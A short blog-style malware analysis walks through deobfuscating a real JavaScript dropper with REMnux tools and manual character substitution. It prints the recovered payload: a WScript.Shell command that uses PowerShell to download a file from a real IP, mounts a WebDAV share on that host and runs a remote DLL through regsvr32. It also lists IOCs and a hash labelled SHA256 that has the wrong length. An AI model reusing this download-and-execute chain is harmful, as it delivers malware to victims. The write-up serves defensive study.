## Malware Analysis -- Javascript Deobfuscation #### Intro I recently started conducting some malware analysis, and I found myself particularly intrigued by a section focused on JavaScript code analysis. I thought it would be the perfect opportunity to dive deeper and sharpen my skills by working with real-world examples. So, here’s a quick and straightforward analysis to get started! #### Sample - I obtained a real sample from [MalwareBazzar](https://bazaar.abuse.ch/sample/811f1a8e96e8f6421f233b537064b16850df7ff043b722161a74124e7781d7c6/) #### Tools 1. REMnux - Linux 2. Ghost Windows 10 (contain my own malware tools) #### Static Analysis SHA256- Hash : `58d9dfb6906f5d06e85773461bd8ecc23f836a73dc0ef98a537e2385faeaaf43cbf5c548e7564bf7c3a09fcbc01259a2` Well, let's give it a first look in `notepadd++`.   #### Observations 1. The actual code that will execute is at the beggining of the script. 2. Many variables to obfuscate the code, `Each variable contains many chars`, so our mission is to find the pattern the code is made from that obfuscation. #### Deobfuscation with `SpiderMonkey` Let's give it a try to deobfuscate it with `spidermonkey` tool in REMnux. ``` js -f sample.js ``` It didn't work well for deobfuscation, but give us one clue, an `eval` fucntion at **line 21**  So, I tried to use `box-js` as it helps to emulate the run time components (like faking urls the malware trying to get) ``` box-js sample.js --download ``` when checking IOC.json and rest fo files, It observed only that there is a registy key being written, but other files contain wiered scripts that doesn't related to the malware :XD. #### Manual Deobfuscation I will replace each variable with a readable `"charX"` : x will be a number that will increase, just to make it more readable Example : ``` this[mqihfsol+olhntqaar+igjpssh+hevjsqi+tslwgc+mkutxa+qmqctvq] == this[char1+char2+char3+char4+char5+char6+char7] ``` final one will be more easy to parse.  Now, there are many variables, each variable have 28-45 character, we need to find which character will be placed before running the script. So, I start looking for something the script must include `http://`, and i found this ``` http:// == char15+char7+char7+char6+char38+char20+char20 ``` and i start looking at the values of each char, they are in sequences, i mean this :  **And configured that the script call the last char of each variable.**  So, we now need to only replace last char with each variable. **After Replacement :**  ``` func=var0[ev "" al];func("array=[10374,12422,14470,13446,11398,12415];var2=this[WScript][CreateObject](WScript.Shell);var3=cmd /c powershell.exe -Command \Invoke-WebRequest -OutFile %temp%\\invoice.pdf http:// 193.143.1.205/invoice.php\&&start %temp%\\invoice.pdf&&cmd /c net use \\\\193.143.1.205@8888\\davwwwroot\\&&cmd /c regsvr32 /s \\\\193.143.1.205@8888\\davwwwroot\\100758775027.dll;var4 = var0[parseInt](var2[RegRead](HKLM_CURRENT_USER\\Control panel\\International\\Locale), 88);var4=9343;for(var1=0;var1<array[length];var1){if(var4 === array[var1]){var2[run](var3,0,0);break;}}") ``` IOCs ``` 1. http://193.143.1.205/invoice.php\&&start %tmp%\\invoice.pdf 2. \\\\193.143.1.205@8888\\davwwwroot\\ 3. \\\\193.143.1.205@8888\\davwwwroot\\100758775027.dll 4. HKLM_CURRENT_USER\\Control panel\\International\\Locale ``` #### Behavioural Analysis Let's ping the C2 if it is active.  Yes, it is, now let's download `invoice.php` that will be saved in `%tmp%\\invoice.pdf`  It is a pdf, when i parsed it with `pdf-parser.py`, it doesn;t contain any js codes. And confirmed that with `virustotal`.   So, Let's look further and try to download the dll `100758775027.dll`. But, the server was off.  So, our analysis concludes here. See you! 🚀 <iframe src="https://giphy.com/embed/3ohfFNaJdwB1vcHJ04" width="480" height="269" style="" frameBorder="0" class="giphy-embed" allowFullScreen></iframe><p><a href="https://giphy.com/gifs/workaholics-season-4-episode-11-3ohfFNaJdwB1vcHJ04"></a></p>